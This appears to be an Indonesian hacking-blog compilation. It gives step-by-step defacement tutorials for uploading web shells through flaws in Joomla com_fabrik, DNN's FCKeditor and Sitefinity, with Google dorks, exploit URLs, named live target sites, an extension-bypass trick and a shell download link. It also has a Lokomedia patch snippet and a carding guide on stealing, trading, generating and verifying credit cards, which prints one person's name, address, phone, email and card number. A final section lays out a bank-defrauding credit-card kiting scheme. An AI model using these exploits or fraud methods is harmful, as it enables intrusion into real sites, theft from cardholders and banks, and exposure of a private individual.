Deface Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

Live Target:
 http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0

1. Gunakan Dork untuk mencari Target di Google 

inurl:index.php?option=com_fabrik

 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D

3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:

Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV

5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php

 Note: Kalo ga berhasil atau error, cari target lain aja :D

7. Goodluck! :p

Video Tutorial >>> LIHAT

Deface menggunakan ASPX

DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx
pilih salah satu dork nya

klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx

di sini ane menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.pivocom.com/ sebagai contohnya..

sehingga akan menjadi seperti ini :
http://www.pivocom.com/Providers/Htm...nkgallery.aspx

setelah nge klik itu, tnggu loading selesai baru kamu harus klik
(File A file on your site)
dan ganti alamat protocol website nya jadi :
javascript:__doPostBack('ctlURL$cmdUpload','' )

ntar keluar sendiri tuh, tombol browse ny kya gini..


klo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.media*fire..com/?72blav74ddvdtea
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt

sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"

upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]

nah..abis itu agan ganti alamat "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi http://www.pivocom.com/portals/0/agarirs.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir http://www.pivocom.com/

Deface Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Dork : "Sitefinity: Login"
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx

pertama agan cari dlu target webnya dengan dork nya.,,
jika target sudah ketemu,masukan exploitnya..
contoh target http://www.hoac-bsa.org/sitefinity/
tambahkan exploitnya sehingga menjadi seperti ini

http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

jika sudah kya tampilan di atas maka sekarang tinggak kita upload shellnya,..contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif)

jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view original size"..
maka hasilnya seperti ini http://www.hoac-bsa.org/Images/agarirs.asp;.jpg

Deface dengan Patch Bug CMS Lokomedia

DORK=

• inurl:"admin/foto_berita/"
• inurl:"media.php?module="
• allinurl:/media.php?module=berita

pilih salah satu aja ..

path :
/admin/content.php?module=user

PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :


session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}





Menambahkan penggalan kode yang sama di file /admin/aksi.php

session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}

menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan penggalan kode berikut:


if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){
echo "Gagal menyimpan data !!!
Tipe file $nama_file : $tipe_file
Tipe file yang diperbolehkan adalah : JPG/JPEG.
";
echo "Ulangi Lagi";
}
else{
.....statement
}

CARA CARDING CARD

Sebenarnya trik ini g bleh di sebar luaskan,tp untuk belajar atau coba2 blehla��.hahahahahahaha

by:RM007 (Rialdi)

Carding, sebuah ungkapan mengenai aktivitas berbelanja secara maya (lewat komputer), dengan menggunakan, berbagai macam alat pembayaran yang tidak sah. pada umumnya carding identik dengan transaksi kartu kredit, dan pada dasarnya kartu kredit yang digunakan bukan milik si carder tersebut akan tetapi milik orang lain.

apa yang terjadi ketika transaksi carding berlangsung, tentu saja sistem pembayaran setiap toko atau perusahaan yang menyediakan merchant pembayaran mengizinkan adanya transaksi tersebut. seorang carder tinggal menyetujui dengan cara bagaimana pembayaran tersebut di lakukan apakah dengan kartu kredit, wire transfer, phone bil atau lain sebagainya.
cara carding sebagai berikut:
1. mencari kartu kredit yang masih valid, hal ini dilakukan dengan mencuri atau kerjasama dengan orang-orang yang bekerja pada hotel atau toko-toko gede (biasanya kartu kredit orang asing yang disikat). atau masuk ke program MIRC (chatting) pada server dal net, kemudian ke channel #CC, #Carding, #indocarder, #Yogyacarding,dll. nah didalamnya kita dapat melakukan trade (istilah �tukar�) antar kartu kredit (bila kita memiliki kartu kredit juga, tapi jika tidak punya kartu kredit, maka dapat melakukan aktivitas �ripper� dengan menipu salah seorang yang memiliki kartu kredit yang masih valid).
2. setelah berhasil mendapatkan kartu kredit, maka carder dapat mencari situs-situs yang menjual produk-produk tertentu (biasanya di cari pada search engine). tentunya dengan mencoba terlebih dahulu (verify) kartu kredit tersebut di site-site porno (hal ini disebabkan karena kartu kredit tersebut tidak hanya dipakai oleh carder tersebut). jika di terima, maka kartu kredit tersebut dapat di belanjakan ke toko-toko tersebut.
3. cara memasukan informasi kartu kredit pada merchant pembayaran toko adalah dengan memasukan nama panggilan (nick name), atau nama palsu dari si carder, dan alamat aslinya. atau dengan mengisi alamat asli dan nama asli si empunya kartu kredit pada form billing dan alamat si carder pada shipping adress. (mudahkan?�..)

jenis kartu kredit:
1. asli didapatkan dari toko atau hotel (biasa disebut virgin CC)
2. hasil trade pada channel carding
3. hasil ekstrapolet (penggandaan, dengan menggunakan program C-master 4, cardpro, cardwizard, dll), softwarenya dapat di Download disini: Cmaster4, dan cchecker (jika ada yang ingin mengetahui CVV dari kartu tersebut)
4. hasil hack (biasa disebut dengan fresh cc), dengan menggunakan tekhnik jebol ASP (dapat anda lihat pada menu �hacking�)
Contoh kartu kredit:
First Name* Judy
Last Name* Downer
Address* 2057 Fries Mill Rd
City* Williamstown
State/Province* NJ
Zip* 08094
Phone* ( 856 )881-5692
E-mail* serengeti@erols.com
Payment Method Visa
Card Number 4046446034843451
Exp. Date 5/04
(Tapi kegiatan semacam ini merupakan tindakan kriminalitas)
By : X-Forum Hacking [HackCode]

CARA MEMBOBOL KARTU KREDIT BANK | MENIPU BANK

HALOOO ALLLL??
MISS U MISS U MISS U,,,,
Setelah sekian lama (lagi) gw tidak pernah update blog ini, dan sekarang gw nyoba buat share trick cara membobol bank* (dengan otak) yang ane bilang keberhasilanya 90% bahkan bisa 100% berhasil.
Trik Membobol kartu kredit atau juga bisa disebut menipu bank dengan cara yang HALAL dan SECURE tanpa harus kita menjadi buronan dsb. Langsung aja dehh, begini cara mainya, (coba perhatikan dan resapi baik-baik yaa) dan sebelumnya saya sudah menganggap kalo elo elo semua udah paham apa itu kartu kredit, persyaratan dan ketentuan2nya.
Lihat Ilustrasi Gambar dibawah ini

**Klik gambar untuk zoom

Sesuai gambar diatas, Kita akan membuat 5 kartu kredit dari bank berbeda dan tanggal jatuh tempo yang berbeda pula. Dengan (sbg contoh) limit per kartu kredit adalah 5 juta (semakin besar limitnya, maka akan semakin kita untung)
Pada gambar diatas yang gw lingkari merah, itu adalah contoh nama bank, dan yang gw lingkarin hijau itu adalah tanggal jatuh tempo.
Dan cara mainya adalah, jika semua kartu kredit dengan limit 5 juta sejumlah 5 kartu kredit dengan bank yang berbeda dan tanggal jatuh tempo yang berbeda sudah kita dapatkan, langkah selanjutnya adalah Ambil semua uang yang bisa kita tarik dari ke lima kartu kredit kita itu(secara umum, biasanya jika kartu kredit hanya mempunyai limit 5 juta, maka kita hanya bisa mengambil 4 juta saja dari setiap kartu kredit) Jadi 4 Juta X 5 Kartu kredit = 20 Juta
20 Juta sudah kita amankan disaku kita namun kita sisihkan 5 juta untuk siap menipu bank, jadi hanya 15 juta saja yang bisa kita nikmati.
Lalu kita menunggu hingga jatuh tempo kartu kredit dari �Bank A� dengan sisa saldo 1 juta (setelah kita ambil tadi 4 juta di setiap kartu kredit) pada gambar diatas yaitu tanggal 1 dibulan berikutnya, Dan sebelum tepat tanggal 1, kita bayarkan uang sebesar 5 juta  tadi yang sudah kita sisihkan, agar kartu kredit dari Bank A akan otomatis menambahkan balance-nya hingga sekarang menjadi6 juta, (tanggal 1 untuk Bank A sudah AMAN)
Kita tunggu hingga tanggal jatuh tempo dari �BANK B� yaitu Tanggal 5,
Disini, tepat sebelum tanggal 5 kita ambil terlebih dahulu saldo dari Kartu kredit �BANK A� sebesar 5 juta yang tadi sudah secara otomatis bertambah saldonya (6 juta).
Kita bayarkan uang sebesar 5 juta tadi untuk menutupi jatuh temponya BANK B pada tanggal 5 sehingga saldo dari �BANK B� akan otomatis bertambah menjadi 6 juta.
Nahhh dari sini sudah paham kan?
Untuk kartu kredit dan tanggal jatuh tempo lainya, kita juga melakukan hal yang sama, yaa seperti istilahnya GALIH LUBANG TUTUP LUBANG.
Kita tunggu hingga tanggal jatuh tempo dari �BANK C� yaitu Tanggal 10,
Disini, tepat sebelum tanggal 10 kita ambil terlebih dahulu saldo dari Kartu kredit �BANK B� sebesar 5 juta yang tadi sudah secara otomatis bertambah saldonya (6 juta).
Kita bayarkan uang sebesar 5 juta tadi untuk menutupi jatuh temponya BANK C pada tanggal 10 sehingga saldo dari �BANK C� akan otomatis bertambah menjadi 6 juta.
DAN BEGITU SETERUSNYA Hingga kembali lagi ke kartu kredit �BANK A� dan akan tetap terus melakukan trik ini di bulan-bulan berikutnya.
SOOO, kita udah dapatkan uang sebesar 15 JUTAdari hasil kita mempermainkan 5 kartu kredit dari 5 bank itu TANPA HARUS Menjadi Buronan dsb, dan ini sudah pernah saya lakukan dan 100% Berhasil�. Namun, saya sarankan, jika anda ingin mencoba trik ini, mohon untuk menggunakan keuntungan ini untuk kebutuhan modal usaha, sehingga nanti uangnya bisa terus mengalir